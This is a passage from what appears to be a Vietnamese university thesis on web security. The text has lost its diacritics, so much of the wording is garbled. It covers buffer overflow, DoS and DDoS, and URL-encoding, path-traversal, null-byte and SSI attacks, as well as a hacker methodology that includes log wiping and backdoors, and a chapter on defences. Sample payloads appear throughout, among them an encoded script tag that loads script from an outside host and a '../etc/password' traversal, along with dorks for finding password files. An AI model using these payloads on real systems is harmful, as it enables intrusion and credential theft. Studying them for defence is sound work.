y ca b nh nh ca b nh <----- FFFFF SSSSSSSSSSSSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF nh ca stack y ca stack S = shellcode
-Trang 104-
Khoa CNTT
A = con tr n shellcode F = cc data khc
(1) Lp trn b m (n return addr) bng a ch ca buffer (2) t shellcode vo buffer Nh vy a ch tr v s tr n shellcode, shellcode s mt root shell. Tuy nhin, tht kh lm cho ret addr tr n ng shellcode. Mt cch c th thc hin c cng vic kh khn , l t vo u ca buffer mt dy lnh NOP(NO oPeration - khng x l), tip theo y shellcode vo sau NOPs. Nh vy khi thay i ret addr tr n mt ni ny u buffer, cc lnh NOP s c thi hnh, chng khng lm g c. n khi gp cc lnh shellcode, shellcode s lm nhim v root shell. Stack c dng nh sau:
y ca b nh nh ca b nh <----- FFFFF NNNNNNNNNNNSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF nh ca stack y ca stack N = NOP S = shellcode A = con tr n shellcode F = cc data khc
-Trang 105-
Khoa CNTT
III. MT S CCH GY TRN B M QUA NG DNG WEB:

Cc bc c bn ca k thut trn b m l: chun b b m dng lm trn, xc nh a ch tr v (RET), xc nh a ch ca b m cha shellcode, cui cng gi thc thi chng trnh b trn b m. Thng qua nhng nhp d liu hacker c th s dng mt chui string nh phn c kh nng thc thi on lnh trn my ch hoc ph v h thng do phi x l d liu qu di, vt kh nng cho php ca h thng ( c th ni cch ny cng l cch tn cng DoS- c ni r hn trong chng 6). Thng thng on m rt n gin, v d nh exec(sh) to ra mt root shell. Mt v d v cch tn cng buffer overflow qua Web l Code Red Worm.
IV. CC CCH PHNG CHNG:

Ngi thit k Web cn phi kim tra k kch thc d liu trc khi s dng. Dng Referer trong HTTP Header kim tra yu cu c phi xut pht t my ngi dng
Nhn xt:
y l k thut tn cng i su vo phn h thng nht, i hi hacker l ngi hiu su v t chc b nh cng nh v ngn ng lp trnh Assembly. Tuy nhin, iu ny ch i hi nu hacker mun iu khin h thng. Nu ch sa i ni dung kch thc nhp t a ln trnh ch mt khi d liu ln h thng c th b ph hy v khng dung lng p ng vic yu cu x l khi d liu . Kiu tn
-Trang 106-
Khoa CNTT
cng ny tng t nh kiu tn cng t chi dch v c ni r hn trong chng tip theo.
-Trang 107-
Khoa CNTT
Chng 9: T chi dch v (Dos)
Chng 9
T CHI DCH V
Ni dung: I. II. III. IV. Khi nim Nhng kh nng b tn cng bng DoS Cc k thut tn cng Bin php phng chng
-Trang 108-
Khoa CNTT
CHNG 9: T CHI DCH V (DoS)
I.
KHI NIM
Tn cng kiu DoS l kiu tn cng lm cho cc dch v mng b t lit, khng cn kh nng p ng c yu cu na. Loi tn cng ny nh hng n nhiu h thng, rt d thc hin v li rt kh bo v h thng khi kiu tn cng DoS. Thng thng, kiu tn cng DoS da trn nhng giao thc (protocol). V d vi giao thc l ICMP, hacker c th s dng bomb e-mail gi hng ngn thng ip email vi mc ch tiu th bng thng lm hao ht ti nguyn h thng trn mail server. Hoc c th dng phn mm gi hng lot yu cu n my ch khin cho my ch khng th p ng nhng yu cu chnh ng khc.
II. NHNG KH NNG B TN CNG BNG DOS

TN CNG TRN SWAP SPACE: Hu ht cc h thng u c vi trm MB khng gian chuyn i ( swap space) phc v cho nhng yu cu t my khch. Swap space thung dng cho cc tin trnh con c thi gian ngn nn DoS c th c da trn phng thc lm trn y swap space. TN CNG TRN BANDWIDTH: Phn bng thng dnh cho mi h thng l gii hn, v th nu hacker cng lc gi nhiu yu cu n h thng th phn bng thng khng p ng cho mt khi lng d liu ln v dn n h thng b ph v.
-Trang 109-
Khoa CNTT
TN CNG VO RAM: Tn cng Dos chim 1 khong ln ca RAM cng c th gy ra cc vn ph hy h thng. Kiu tn cng BufferOverflow l mt v d cho cch ph hy ny (xem k hn trong ni dung chng..) TN CNG VO DISKS: Mt kiu tn cng c in l lm y a cng. a cng c th b trn v khng th c s dng na.
III. CC K THUT TN CNG:

III.1. Khi nim v Tcp bt tay ba chiu:
u tin, tm hiu phng php tn cng DoS , lun vn s trnh by c ch lm vic tcp bt tay ba chiu. Gi d liu TCP cha flag bits (c) m t ni dung v mc ch ca gi d liu . V d 9.III.1-1: Gi d liu TCP vi c SYN (synchoronize) dng bt u 1 kt ni ACK (acknowledgement) FIN (finish) dng ct 1 kt ni Cch hot ng ca gi TCP:
-Trang 110-
Khoa CNTT
Hnh 9.III.1-1: C ch thit lp kt ni trc khi truyn s liu
Buc 1: My con gi gi tin SYN yu cu kt ni Bc 2: Nu my ch chp nhn kt ni, my ch s gi gi tin SYN/ACK Server bt buc phi gi thng bo li bi v TCP l chun tin cy nn nu my con khng nhn c thng bo th s ngh rng packet b lc v gi li mt packet mi . Bc 3: My con gi hi p bng gi tin ACK Bo cho my ch bit rng my con nhn c SYN/ACK packet v lc ny kt ni c thit lp.
-Trang 111-
Khoa CNTT
III.2. Li dng TCP thc hin phng php SYN flood truyn thng:
Hnh 9.III.2-1: Tn cng DoS truyn thng
Nh cp v vn thit lp kt ni trong phn 1, bt c 1 gi tin SYN, my ch cng phi 1 phn ti nguyn ca h thng nh b nh m nhn v truyn d liu cho ng truyn . Tuy nhin, ti nguyn ca h thng l c hn v hacker s tm mi cch h thng trn qua gii hn . ( y cn c gi l half-open connection v my khch m kt ni gia chng) Theo hnh 9.III.2-1: Nu my ch sau khi gi tr mt gi tin SYN/ACK thng bo chp nhn kt ni cho my yu cu nhng nu a ch IP ca my yu cu ny l gi mo th gi tin khng th n c ch, nn my ch vn phi dnh ti nguyn cho yu cu . Sau mt thi gian khng nhn c phn hi t my khch, my ch li tip tc gi mt gi tin SYN/ACK xc nhn ln na v c nh vy, kt ni vn tip tc m. Nu nh hacker gi nhiu gi tin SYN n my ch n khi my ch khng th tip nhn thm 1 kt ni no na th lc ny h thng b ph v.
-Trang 112-
Khoa CNTT
Kt lun: Ch vi mt ng truyn bng thng nh, hacker c th ph v mt h thng. Thm vo , a ch IP ca hacker c th c sa i nn vic xc nh th phm l mt vn ht sc kh khn.
III.3. Tn cng vo bng thng III.3.1. Kiu tn cng th 1

Hacker hon ton c kh nng lm ngp h thng v bng thng ca hacker ln hn bng thng ca my ch. Kiu tn cng ny khng b hn ch bi tc truyn mng. V d 9.III.3.1-1: Hacker c mt ng truyn tc cao T1 ( 1.544- Mbps ) hay ln hn c th d dng ph v mt h thng c ng truyn 56Kbps.
III.3.2.
Kiu tn cng th 2
Kiu tn cng ny c s dng khi ng truyn mng ca hacker l qu thp so vi ng truyn ca my ch. Khng ging nh kiu tn cng DoS truyn thng ( phn 2 ), kiu tn cng vo bng thng ln hn s li dng nhng gi tin t nhng h thng khc nhau cng mt lc tin n h thng ch khin cho ng truyn ca h thng ch khng cn kh nng p ng, my ch khng cn kh nng nhn mt gi tin no na.
-Trang 113-
Khoa CNTT
Hnh 9.III.3.2-1: Kiu tn cng DoS vo bng thng
Theo hnh 9.III.3.2-1, tt c cc gi tin i vo 1 mng my tnh qua 1 "Big-Pipe" ( ng dn ln ), sau c router chia ra nhng "Small Pipe" ( ng dn nh ) cho nhiu my tnh con ty theo a ch IP ca gi tin. Nhng nu ton b "Big-Pipe" b lm ngp bng nhng gi tin ch hng n 1 my nht nh trong mng my tnh con ny, router nh phi chp nhn loi b phn ln cc packet ch cn li s lng va i qua "Small Pipe" ca my tnh . Kiu tn cng ny s loi my ch ra khi Internet. y l phng php tn cng kiu t chi dch v nhng khng l DoS m gi l DDoS ( kiu t chi dch v phn tn ), ngha l cng mt lc nhiu my s c pht ng gi gi tin n my ch ( mc d ng truyn ca mi my khng cao nhng nhiu ng truyn li hp thnh mt ng dn Big Pipe), lm cho my ch khng cn kh nng tip nhn gi tin v b loi khi mng Internet, nh s minh ha sau:c router chia ra nhng "Sm
-Trang 114-
Khoa CNTT
computer con ty
Hnh 9.III.3.2-2: Tn cng DDoS
DRDoS (Distributed Reflection Denial of Service) - Th h tip theo ca DDoS: y cng chnh l nguyn nhn khin cho trang grc.com b ph v. Hnh sau s minh ha kiu tn cng DRDoS ny.
-Trang 115-
Khoa CNTT
Hnh 9.III.3.2-3. Tn cng kiu DRDoS
Bng cch gi a ch IP ca my ch, hacker s cng lc gi nhiu gi tin n cc h thng my mnh trn mng, cc h thng ny khi nhn gi tin SYN gi ny, chp nhn kt ni v gi tr mt gi tin SYN/ACK thng bo. V a ch IP ca gi tin SYN b hacker sa i thnh a ch IP my ch nn nhng gi tin SYN/ACK s c gi v cho my ch. Cng mt lc nhn c nhiu gi tin, ng truyn ca my ch khng kh nng p ng, h thng my ch t chi nhn bt k gi tin no v lc ny h thng my ch b sp .
-Trang 116-
Khoa CNTT
III.4. Kiu tn cng vo ti nguyn h thng

y l kiu tn cng nhm vo ti nguyn h thng hn l ti nguyn mng nh CPU, b nh, file h thng, tin trnh..Hacker l mt ngi dng hp l ca h thng, v c mt lng ti nguyn gii hn trn h thng. Tuy nhin, hacker s lm dng quyn truy cp ny yu cu thm ti nguyn. Nh vy, h thng hay nhng ngi dng hp l s b t chi s dng ti nguyn chia s. Kiu tn cng s khin cho h thng khng th s dng c v ti nguyn b s dng ht, khng cn tin trnh thc thi na.
IV. BIN PHP PHNG CHNG

Kiu tn cng t chi dch v l kiu tn cng gy nhiu kh khn trong vn bo v cng nh iu tra tm ra th phm nht, bi v hu ht hacker thay i a ch IP ca my mnh nn rt kh xc nh ai l th phm. phng chng kh nng khuych i ng truyn, cn: Hu kh nng broadcast ti router bin Tng kch thc hng i kt ni -> kt qu: c th phng trnh kh nng trn hng i qua nhiu kt ni, nhng cch ny s dng nhiu ti nguyn Gim thi gian thit lp kt ni Dng nhng phn mm pht hin v ph hy kiu tn cng DoS: Hu ht nhng h iu hnh hin nay u h tr kh nng pht hin v phng chng kiu tn cng lt SYN.
-Trang 117-
Khoa CNTT
Tuy nhin cng c nhng phn mm c c kh nng trnh kiu tn cng ny. V d nh vi Linux kernels 2.0.30 v v sau ci t mt ty chn gi l SYN Cookie, kernel c nhim v truy tm v lu vt nhng kh nng c th xy ra k thut SYN. Sau , kernel s s dng mt giao thc m ho nh SYN cookie cho php ngi dng hp l ca h thng tip tc kt ni n h thng Vi WindowNT 4.0 tr v sau, s dng k thut backlog, mi khi hng i kt ni khng p ng, h thng t ng cung cp ti nguyn cho hng i, v th hng i s khng b ph v. ng dng ch cho php mi mt my con ch c thit lp s kt ni ti a theo qui nh trnh trng hp hacker gi cng lc nhiu yu cu gy tc nghn.
Nhn xt:
Kiu tn cng t chi dch v tuy ch khin cho h thng b ph v trong vi pht nhng hu qu th kh to ln (nh hng trn phm vi tin v uy tn). y l k thut thng c hacker s dng trong trng hp khng th chim quyn qun tr trn h thng hoc thng tin, hoc mun ph hy uy tn ca c quan .Thm vo vic gi mo a ch khin cho hacker cng d dng thc hin vic tn cng m khng s b pht hin. Thng thng k thut ny c thc hin km theo s h tr ca vi cng c nh ping of death, teardropNhng cng c ny c lit k thm trong chng 8 tip theo.
-Trang 118-
Khoa CNTT
Chng 10: Mt s k thut tn cng khc
Chng 10
MT S K THUT TN CNG KHC

Ni dung : I. II. M ha URL. Kiu tn cng vt ng dn
III. Tn cng da vo k t rng IV. Ngn ng trnh ch
-Trang 119-
Khoa CNTT
CHNG 10: MT S K THUT TN CNG KHC
I. M HA URL (URL Encoding)

I.1. Khi nim
Theo RFC 1738 nh ngha URL v RFC 2369 cho URIs, nhng k t c gii hn s dng trn URL hoc URI l mt tp cc k t US-ASCII. Theo RFC 1738, 2369 nhng k t ch s, k t c bit nh $-_.+!*() v mt s k t dnh ring l khng b m ho trn URL hay URIs. Cn nhng k t c bit khc th c m ha nh khong trng, < > Sau khi trnh ch nhn c d liu ny, trnh ch s t ng gii m thao tc nh bnh thng. Vy hacker c th li dng c g trong URL m ha ny. Nhng nh pht trin ng dng c th s thit k ng dng kim tra d liu nhp vo ca ngi dng c hp l hay khng, nhng k t c bic nh < > trong th script thng c dng trong nhng k thut tn cng nh XSS s b lai b Vy hp thc ha ni dung d liu cn nhp, hacker thay v nhp trc tip k t c bit vo nhp th h c th nhp nhng k t c m ho theo chun RFC 1738, RFC 2369. Nh vy bng cch , hacker c th d dng vt qua kim sot ny.
-Trang 120-
Khoa CNTT
V d 10.I.1-1:
http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22htt p%3a%2f%2fwww.yourserver.com%2fbadscript.js%22%3e%3c%2fscript%3e
Bin mydata s mang ni dung:

<script src="http://www.yourserver.com/badscript.js"></script>
I.2. Mt s bin php phng chng

Trnh s dng phng thc GET v nu dng GET, d liu d dng c thm vo URL. V th, s dng phng thc POST bt c khi no c th. Trong trng hp URL bt buc c s dng chuyn d liu ln trnh ch, cn gii hn kiu d liu, nn kim tra d liu trong ng dng trc khi s dng. Khng nn s dng ngn ng my khch kim tra tnh ng n ca d liu.
II. KIU TN CNG VT NG DN II.1. Khi nim

Nhiu ng dng s dng tp tin h thng ca trnh ch trong lp trnh by hin th thng tin lu tr tm thi. Nhng tp tin ny bao gm nhng tp tin hnh nh , tp tin HTML, hay nhng ng dng CGI. Th mc WWW-ROOT l mt th mc gc o bn trong trnh ch, ni m c truy xut bi trnh duyt. ng dng lu tr thng tin bn trong hoc bn ngai WWW-ROOT. Nu ng dng khng kim tra nhng k t c bit, thng c s dng trong ng dn nh / th c th rng ng dng c mt l hng cho kiu tn cng
-Trang 121-
Khoa CNTT
vt ng dn. Hacker c th yu cu trnh ch tr v kt qu l ni dung nhng tp tin vt l nh /etc/password Tm li: Kiu tn cng ny cng da vo s lng lo trong qu trnh kim tra d liu trn URL, cookie, HTTP Header yu cu. Li dng quyn truy xut mt tp tin ca ng dng, nh hacker c th xem c file lu tr trn h thng. V d 10.II.1-1:
http://maydich.com/show.asp?result= dangnhapthanhcong.asp
nhng nu hacker thay i tn tp tin cn truy xut nh sau:

http://maydich.com/show.asp?result= ../etc/password
nh vy hacker c th xem ni dung file password c lu tr trong h thng.
II.2.
Mt s bin php phng chng
Vic phng chng kiu tn cng vt ng dn l mt th thch ln cho nhng nh ng dng trong mt h thng phn tn. Tuy nhin, cch phng chng tt nht vn l ng dng cn kim tra vic truy xut file trc khi xut kt qu cho trnh duyt.
-Trang 122-
Khoa CNTT
III. TN CNG DA VO K T RNG III.1. Khi nim

Nhiu ng dng Web thng s dng ngn ng lp trnh nh C, Java to modul x l nhng cng vic nh thao tc trn nhng d liu nhp vo t ngi dng. Li dng k t kt thc chui m hacker s thm vo mt chui nhp nh la ng dng. V d 10.III.1-1: Gi s hacker a vo mt chui AA\0BB th qua chng trnh lp trnh bng ngn ng C, chui ny c th b ct ngn thnh AAAA v C xem \0 l du hiu kt thc chui. Hacker c th li dng iu ny vt qua cc khu kim tra ni dung chui.
III.2. Mt s bin php phng chng

Cch duy nht phng chng trng hp ny l ch chp nhn nhng d liu hp l. Nhng k t nh \ phi b lai b trc khi ng dng s dng chng.
IV. NGN NG PHA TRNH CH

IV.1. Khi nim
SSI l on m c nhng vo trong trang Web yu cu trnh ch cung cp thng tin mt im no trong trang. V d 10.IV.1-1:
-Trang 123-
Khoa CNTT

Dng lnh trn nhng ni dung file test.asp vo trong trang Web. Tuy nhin, SSI khng phi c h tr trong hu ht cc trnh ch, Apache v IIS l 2 trnh ch h tr SSI. Trang Web c s dng SSI thng c lu di dng .shtml hoc .stm (l phn m rng ca .html hay .htm) bo hiu cho trnh ch bit trang ny c s dng SSI tit kim thi gian x l cho trnh ch (khng mt thi gian tm kim). Qu trnh thc hin x l mt trang Web yu cu: Nu khng c bt k ch th no khc, trnh ch ch gi ni dung trang Web cho trnh duyt nhng vi mt SSI, th cng vic tun t theo nhng bc nh sau: Trnh ch nhn d liu v phn tch d liu (tm kim v phn loi nhng cu lnh c bit) ch th thc hin Da trn nhng cu lnh m trnh ch tm thy, trnh ch thc thi nhng cu lnh tr kt qu cho trnh duyt. Tr kt qu v cho trnh duyt C 3 kh nng thc hin: Nhn thng tin t mt file v chn vo trong trang Gn gi tr cho mt s bin Gi chng trnh CGI Ni dung cu lnh SSI xem trong phn ph lc.
-Trang 124-
Khoa CNTT
IV.2. Cch tn cng

Hacker li dng nhng nhp chn thm vo ni dung mt cu lnh SSI. V d 10.IV.2-1:
 Thit lp cu lnh Select  Cu lnh ny di chuyn con tr n dng u tin trong tp tin.  Hin th ni dung dng u tin.
IV.3. Bin php phng chng

Vi ngi qun tr, cu hnh li trnh ch sao cho trnh ch khng h tr SSI. Vi ngi lp trnh, kim tra k ni dung d liu gi t ngi dng. Loi b nhng k t nh < > # -- !Tuy nhin iu ny nn c thc hin ti trnh ch, khng nn kim tra tnh ng n ca d liu bng ngn ng pha trnh khch, v kh nng thay i ni dung ca trang Web.
-Trang 125-
Khoa CNTT
Chng 11: Tng kt qu trnh tn cng ca Hacker
Chng 11
TNG KT QU TRNH TN CNG CA HACKER

Ni dung: I. Thu thp thng tin mc h tng ca mc tiu
II. Kho st ng dng Web III. Tn cng
-Trang 126-
Khoa CNTT
CHNG 11: TNG KT QU TRNH TN CNG CA HACKER
Theo ti liu Hacking Exposed ca Stuart McClure, Joel Scambray, George Kurtz th cc k tn cng thng thc hin cc giai on sau khi tn cng
I. THU THP THNG TIN MC H TNG CA MC TIU

Bc 1: FootPrinting (thu thp thng tin): y l cch m hacker lm khi mun ly mt lng thng tin ti a v my ch/doanh nghip/ngi dng, bao gm chi tit v a ch IP, Whois, DNS ..v.v - l nhng thng tin chnh thc c lin quan n mc tiu. Cng c h tr: UseNet , search engines (cng c tm kim) , Edgar Any Unix client, http://www.networksolutions.com/whois, nslookup Is -d , Sam spade, http://www.arin.net/whois, dig Bc 2: Scanning (Qut thm d): Phn ln thng tin quan trng t server c c t bc ny , bao gm qut cng, xc nh h iu hnh, .v.v.. bit cc port trn server, nghe ng d liu. Cc cng c: fping, icmpenum Ws_ping ProPack, nmap, SuperScan, fscan nmap, queso, siphon. Bc 3: Enumeration (lit k tm l hng):
-Trang 127-
Khoa CNTT
Bc th ba l tm kim nhng ti nguyn c bo v km, hoch ti khon ngi dng m c th s dng xm nhp, bao gm cc mt khu mc nh, cc script v dch v mc nh. Rt nhiu ngi qun tr mng khng bit n hoc khng sa i li cc gi tr ny. Cc cng c ph tr: null sessions, DumpACL, sid2user, OnSite Admin showmount, NAT Legion banner grabbing vi telnet, netcat, rpcinfo. Bc 4: Gaining access (Tm cch xm nhp): By gi hacker s tm cch truy cp vo mng bng nhng thng tin c c ba bc trn. Phng php c s dng y c th l tn cng vo li trn b m, ly v gii m file password, hay brute force (kim tra tt c cc trng hp) password. Cc cng c: tcpdump, L0phtcrack readsmb, NAT, legion, tftp, pwdump2 (NT) ttdb, bind, IIS, HTR/ISM.DLL. Bc 5: Escalating privilege (Leo thang c quyn): Trong trng hp hacker xm nhp c vo mng vi mt ti khon no , th h s tm cch kim sot ton b h thng. Hacker s tm cch crack password ca admin, hoc s dng l hng leo thang c quyn. John v Riper l hai chng trnh crack password rt hay c s dng. Cng c: L0phtcrack, Ic_messages, getadmin, sechole. Bc 6: Pilfering (Dng khi cc file cha pass b s h):
-Trang 128-
Khoa CNTT
Thm mt ln na cc my tm kim li c s dng tm cc phng php truy cp vo mng. Nhng file text cha password hay cc c ch khng an ton khc c th l ch cho hacker. Thng tin ly t bc trn ta nh v server v iu khin server. Nu bc ny khng thnh cng, n bc <9>. Cng c h tr: rhost, LSA Secrets user data, configuration files, Registry. Bc 7: Covering Tracks (Xo du vt) : Sau khi c nhng thng tin cn thit, hacker tm cch xo du vt, xo cc file log ca h iu hnh lm cho ngi qun l khng nhn ra h thng b xm nhp hoc c bit cng khng tm ra k xm nhp l ai. Xa log. Cng c: Zap, Event log GUI, rootkits, file streaming. Bc 8: Creating Backdoors (To ca sau chun b cho ln xm nhp tip theo c d dng hn): Hacker li "Back Doors", tc l mt c ch cho php hacker truy nhp tr li bng con ng b mt khng phi tn nhiu cng sc, bng vic ci t Trojan hay to user mi (i vi t chc c nhiu user). Cng c y l cc loi Trojan, keylog, creat rogue user accounts, schedule batch jobs, infect startup files, plant remote control services, install monitoring mechanisms, replace apps with Trojan.
-Trang 129-
Khoa CNTT
Cng c: members of wheel, administrators cron, At rc, Startup folder, registry keys, netcat, remote.exe, VNC, BO2K, keystroke loggers, add acct to secadmin mail aliases login, fpnwclnt.dll
II. KHO ST NG DNG WEB

Phng php kho st kh ph bin, l Xem m ngun v li dng cc li cho php xem m ngun. Mt s ngn ng web thng dng hin nay c nhiu li ny nh Active Server Pages (ASP), Common Gateway Interface (CGI), ColdFusion Server (CFM), Hypertext Preprocessor (PHP). Tm cc site b li ny bng cch dng www.google.com, search t kha lin quan. S dng allinurl: trc on string c bit cn kim, th nhng trang Web tm kim c chc chn s c chui cn tm. V d 11.II-1: "allinurl:/advadmin" (khng c ngoc kp) th ch lit k ra nhng trang c URL c dng : http://tentrangweb.com/advadmin. Tm cc file trn http://www.google.com th thm ch type file: trc tn file cn tm trn cc chuyn khu web. V d 11.II-2: + Mun tm file mdb (y l file cha mt khu ca cc trang Web, dng Access m) th vo http://www.google.com v nh type file:mdb
-Trang 130-
Khoa CNTT
+ Tm file SAM (y l file cha Password ca Windows NT, dng L0phtCrack Crack) th vo http://www.google.com v nh type file:SAM Tn cng vt qua cc c ch kim sot (authentication, authorization) Bao gm cc phng php nh on mt khu, thay i thng tin cookies, cc k thut directory traversal, leo thang c quyn, cc phng php tn cng da vo SQL, SQL injection... Tm hiu su v cc chc nng ca ng dng web Tm hiu cch thc hin ca cc phn trong ng dng, c bit nh cc order input, confirmation, order tracking. y ta c th p dng cc phng php nh SQL Injection, input validation... Tm hiu lung di chuyn ca thng tin Cc thng tin tng tc gia client v server, cc thng tin tng tc vi database. Hin nay vic vit m thc hin vic giao tip thng tin thng phi m bo c tnh hiu qu (nhanh), v bo mt (c th s chm hn). Thng th tnh hiu qu c u tin hn do c th s pht sinh li trong qu trnh v gip hacker c th li dng cc li nh SQL input... ot quyn iu khin h thng.
III. TN CNG
Sau khi thu thp v kho st k cng i tng, hacker bt u thc hin tn cng nhm xm nhp vo h thng ly thng tin, a thng tin xu vo, dnh quyn kim sot, Cn nu khng thnh cng trong vic xm nhp, th Dos l cch thc cui cng m hacker thng la chn lm cho h thng khng th hot ng c.
-Trang 131-
Khoa CNTT
Nhn xt:
Vic thu thp thng tin l v cng quan trng cho vic tn cng vo mt h thng my ch. Cho d hacker tn cng theo phng din phn cng hay qua ng dng th vic thu thp vn l cn thit. Vn l vic thc hin s theo tng bc nh th no. C th trong nhng bc nu hacker khng cn phi i qua theo th t hay qua ht, nhng vic nm r thng tin ca my ch lun l iu kin tin quyt dn n thnh cng trong vic tn cng. Ty vo ni dung thng tin m hacker thu thp c m hacker s quyt nh tn cng theo k thut no. Do , vic bo mt cho mt h thng cn i hi s kt hp khng ch ca ring nh qun tr h thng m cn ca nh thit k ng dng v s hp tc ca c nhng khch hng s dng ng dng. Nhim v ny s c cp r hn trong chng 12.
-Trang 132-
Khoa CNTT
Chng 12: Tng kt cc bin php phng chng
Chng 12
TNG KT CC BIN PHP PHNG CHNG

Ni dung: phng chng hacker cn vai tr ca I. II. III. Vi nh qun tr mng Vi nh thit k ng dng Web Vi ngi dng
-Trang 133-
Khoa CNTT
CHNG 12: TNG KT CC BIN PHP PHNG CHNG
Phng chng hacker khng phi l nhim v ca ring nhng ngi lp trnh Web m cn c s kt hp, h tr ca ngi qun tr v chnh bn thn ngi dng. Thiu st mt trong nhng yu t ny u c th dn n thng tin b nh cp v thm ch hacker c th iu khin c c h thng mng. V th, bo v mt h thng khi s tn cng ca hacker, lun vn s trnh by theo 3 vai tr: vai tr ngi qun tr mng, vai tr ngi lp trnh ng dng v vai tr ca ngi dng.
I. VI NHNG NH QUN TR MNG

Ngi qun tr h thng cn xc nh r nhng i tng no l quan trng nht trong h thng cn bo v; xc nh r mc u tin i vi nhng i tng . V d cc i tng cn bo v trn mt h thng c th l: Cc my ch dch v, cc router, cc im truy nhp h thng, cc chng trnh ng dng, h qun tr CSDL, cc dch v cung cp ... Cu hnh cho nhng ng dng: Thn trng trong vic cu hnh trnh ch v mt s ng dng. Trnh ch nn hay khng cho php thc thi nhng cu lnh SSI. Ngoi ra phi thit lp quyn cho ng dng ch chy di mt s quyn hn nht nh nh trong qun tr c s d liu ( khng nn chy quyn Admin) trnh trng hp hacker c th li dng chy nhng cu lnh iu khin h thng.
-Trang 134-
Khoa CNTT
Xc nh nguy c i vi h thng chnh l xc nh cc l hng bo mt ca cc dch v, ng dng trn h thng . Vic xc nh ng n cc nguy c ny gip ngi qun tr c th trnh c nhng cuc tn cng mng, hoc c bin php bo v ng n bng cch thng xuyn cp nht tin tc trn cc nhm tin v bo mt v t nh cung cp phn mm pht hin nhng li ca phn mm s dng. Khi pht hin li cn cp nhp nhng phn mm mi nht trnh trng hp hacker li dng nhng l hng c trong nhng ng dng cha c sa cha trong phin bn c. Nm c hot ng ca cc phn mm s dng, ngha ca cc file cu hnh quan trng (nh etc/password), p dng cc bin php bo v cu hnh nh s dng phng thc m ha hashing code (MD5). S dng mt vi cng c c th pht hin ra cc hot ng truy nhp khng hp l vo mt h thng nh logfile. Kim sot cht ch cc quyn ca cc ti khon trn h thng; khng s dng quyn root trong cc trng hp khng cn thit. i vi cc ti khon khng s dng trn h thng cn i mt khu hoc hy b. Qun l mt khu mt cch cht ch o Buc ngi s dng thay i mt khu trong mt thi gian nht nh. Hu ht cc h thng hin nay u h tr c ch ny; nu khng thay i mt khu, ti khon khng cn gi tr trn h thng. o Trong trng hp ngi s dng b mt mt khu, cp li mt khu mi cn c cc th tc khc xc thc ngi s dng ...
-Trang 135-
Khoa CNTT
o Cn gim st v theo di cht ch cc chng trnh i mt khu; y thng l mc tiu tn cng.
II. VI NHNG NH THIT K NG DNG WEB:

m bo d liu c cung cp t ngi dng l hp l: Tt c nhng d liu c a vo ng dng phi m bo c kim tra k, loi b hoc t chi nhng k t c bit nh < > / Tuy nhin, khng nn dng ngn ng trnh khch (nh JavaScript, VBScript) kim tra d liu nhp hp l v hacker vn c th li dng tn cng nh trong k thut m ho URL hay vt ng dnCch tt nht vn l kim tra ngay trn ng dng. Nu khng th t chi cng nh lai b nhng k t, ng dng cn kim tra d liu xut m bo rng d liu xut n trnh duyt l an ton. V d 12.II-1: Vi SQL Injection, ng dng cn xut mt trang bo li do chnh ng dng qui nh phng trnh trng hp hacker li dng ni dung bo li c php SQL ly thng tin. Ngoi ra, ng dng cn kt hp vi HTTP Header, c bit l thnh phn Referer m bo trang yu cu khng xut pht t my hacker nh trong k thut Buffer Overflow, thao tc trn bin n form, Chng thc ngi dng:
-Trang 136-
Khoa CNTT
Nhiu ng dng hin nay qun l mt phin lm vic ca ngi dng bng sessionID nhng s yu km trong cch qun l mt phin lm vic khin cho hacker c th d dng kim sot c mt phin lm vic ca ngi dng nh trong k thut qun l phin lm vic. V th, i vi mt phin lm vic, ng dng cn hy ngay sau khi trnh duyt ng kt ni. M ha d liu quan trng: Nhng thng tin quan trong nh tn/mt khu, credit card, cn c m ha trnh hacker c th ly c ni dung v s dng chng nh trong k thut XSS, SQL Injection...Ngoi ra, trong qu trnh truyn, kt hp phng php SSL trnh trng hp mt mt thng tin trn ng truyn. Hin nay trong lnh vc m ha d liu, c rt nhiu phng php m ha nh m ha kha b mt, m ha kha cng khai,nn ty vo mc s dng cng nh tm quan trng m ng dng c th chn mt trong nhng phng php m ha m bo d liu c bo mt. Tuy nhin, hin nay nhiu nh ng dng li m ha d liu kt hp vi vi thng tin nh ngy gi, a ch IPkhin cho hacker c th d dng d on, hoc ni dung d liu m ha qu ngn khin cho hacker c th s dng nhng cng c sn c vt cn nhng kh nng c th xy ra nh trong k thut tn cng sessionID. Hoc phng php m ha qu c khin cho hacker c th d dng dng nhng cng c gii m nh John and Ripper. Do , cn chn thut ton m ha cng vi kha m ha sao cho d liu khng d d on v b vt cn.
-Trang 137-
Khoa CNTT
Ngoi ra, vic dng SSL l cn thit trnh trng hp d liu b nh cp trn ng truyn. Dng phn mm c sn: Hin nay trn th trng xut hin nhng phn mm nh Appshield hot ng nh mt proxy, ngha l trung gian gia my khch v my ch, mi yu cu t my khch u i qua phn mm ny, nu pht hin trong yu cu c n cha kh nng tn cng ln h thng, n s t chi yu cu, khng gi ln my ch na m s t ng hy yu cu. Thit lp quyn: Vi nhng ng dng, h thng ch nn cung cp nhng quyn hn nht nh sao cho ng dng thc hin cc chc nng ca mnh. Khng nn a quyn cao nht, nh root v hacker c th li dng quyn root ny c th thc thi nhng cu lnh ca h thng, nh trong k thut tn cng SQL Injection, Buffer Overflow
III. VI NGI S DNG NG DNG WEB:

a ra nhng li cnh bo cho ngi s dng Web ri ro c th xy ra, c bit nn ch khi cho php trnh duyt thc thi ngn ng trnh khch trn my ca mnh, v kh nng li dng ngn ng ny l rt ln nh trong k thut XSS, sessionID. Sau khi s dng xong ng dng cn thot ra khi h thng theo qui nh ( nh Sigh-out ca Yahoo) nhng ni dung quan trng lu tr trong cookie b hy
-Trang 138-
Khoa CNTT
b, trnh kh nng hacker vn tip tc dng session ID tn ti ng nhp vo h thng hp l. Qun l ti khon: Ngi s dng cn nhn thc c vai tr quan trng trong vic bo v ti khon ca mnh. Cc hot ng qun l ti khon bao gm vic bo v mt khu, thay i mt khu nh k, ng k thi im, ... S dng cc phn mm bo v my trm ca ngi s dng, log out khi h thng sau mt thi gian time-out ... o Pht hin ti khon s dng tri php: Ngi dng cn c hun luyn v cc cch pht hin ti khon ca mnh s dng tri php nh th no. Ngi s dng cn thng xuyn kim tra cc hot ng ca mnh m bo khng c ngi khc li dng ti khon thc hin nhng hnh ng khc.
Nhn xt:
